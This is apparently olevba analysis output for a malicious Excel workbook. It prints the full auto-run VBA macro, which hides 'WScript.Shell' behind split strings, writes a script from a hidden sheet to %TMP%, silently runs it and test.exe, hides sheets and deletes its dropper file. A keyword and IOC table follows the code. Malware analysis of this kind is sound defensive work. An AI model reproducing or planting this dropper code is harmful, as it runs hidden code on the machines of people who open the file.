Malicious Excel macro

olevba 0.41 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASIHB-V slimeware_12240B87F8.xls

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: slimeware_12240B87F8.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ÝòàÊíèãà.cls
in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Workbook_Open()
On Error GoTo Ends

Dim zsAdasdad
zsAdasdad = "%TMP%\999.vbs"
sdfssasd = "%TMP%\test.exe"

'==================================================
Dim osdd, WshShell, zxcvcb, Wscript, gsjmsas
zcxaffq = "WSc"
zaafff = "ript"
gsjmsas = zcxaffq & zaafff
zcxaffq = gsjmsas & ".Shell"

Set WshShell = CreateObject(zcxaffq)
SatT23787S4242ve = "%TMP%\999.vbs"
zsAdasdad = WshShell.ExpandEnvironmentStrings(zsAdasdad)
SasatT23S4242ve = "%TMP%\999.vbs"
Set s = CreateObject("ADODB.Stream")
s.Mode = 3
s.Type = 2
s.Open
Sa32t45T23S4242ve = "%TMP%\999.vbs"
s.WriteText Worksheets("Code").Range("B8").Value
Call s.SaveToFile(zsAdasdad, 2)
Sa23tT23S4242ve = "%TMP%\999.vbs"


WshShell.Run zsAdasdad, 0, True
WshShell.Run sdfssasd, 0, False


Ends:
S23at1213T23S4242ve = "%TMP%\999.vbs"
Set MainSheet = Application.ThisWorkbook.Sheets("Total")
Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
MainSheet.Visible = True
StartSheet.Visible = xlVeryHide
Sa324tT2334535S4242ve = "%TMP%\999.vbs"
Kill zsAdasdad

End Sub


Sub ToStart()
Set MainSheet = Application.ThisWorkbook.Sheets("Total")
Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
StartSheet.Visible = True
MainSheet.Visible = xlVeryHide
Application.ThisWorkbook.Sheets("Code").Visible = xlVeryHide
End Sub

Sub ExpandAll()
Set MainSheet = Application.ThisWorkbook.Sheets("Total")
Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
StartSheet.Visible = True
MainSheet.Visible = True
Application.ThisWorkbook.Sheets("Code").Visible = True
End Sub


-------------------------------------------------------------------------------
VBA MACRO Ëèñò1.cls
in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Worksheet_Activate()

End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò2.cls
in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò4.cls
in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04424'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
| Suspicious | Kill                 | May delete a file                       |
| Suspicious | Open                 | May open a file                         |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | Run                  | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | ADODB.Stream         | May create a text file                  |
| Suspicious | WriteText            | May create a text file                  |
| Suspicious | SaveToFile           | May create a text file                  |
| Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
|            |                      | be used to obfuscate strings (option    |
|            |                      | --decode to see all)                    |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
|            | Strings              | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | 999.vbs              | Executable file name                    |
| IOC        | test.exe             | Executable file name                    |
+------------+----------------------+-----------------------------------------+